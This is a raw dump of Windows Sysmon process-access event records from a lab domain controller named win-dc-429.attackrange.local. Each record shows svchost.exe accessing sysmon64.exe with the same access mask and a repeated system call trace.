09:20:16.999{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053116Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.999{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053115Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.999{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053114Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.999{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053113Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.999{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053112Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.999{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053111Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.999{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053110Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.999{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053109Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.999{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053108Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.999{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053107Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.999{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053106Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.999{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053105Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.999{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053104Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.999{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053103Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.968{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053102Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.968{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053101Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.968{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053100Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.968{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053099Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.968{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053098Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.968{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053097Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.968{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053096Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.968{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053095Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.968{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053094Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.968{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053093Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 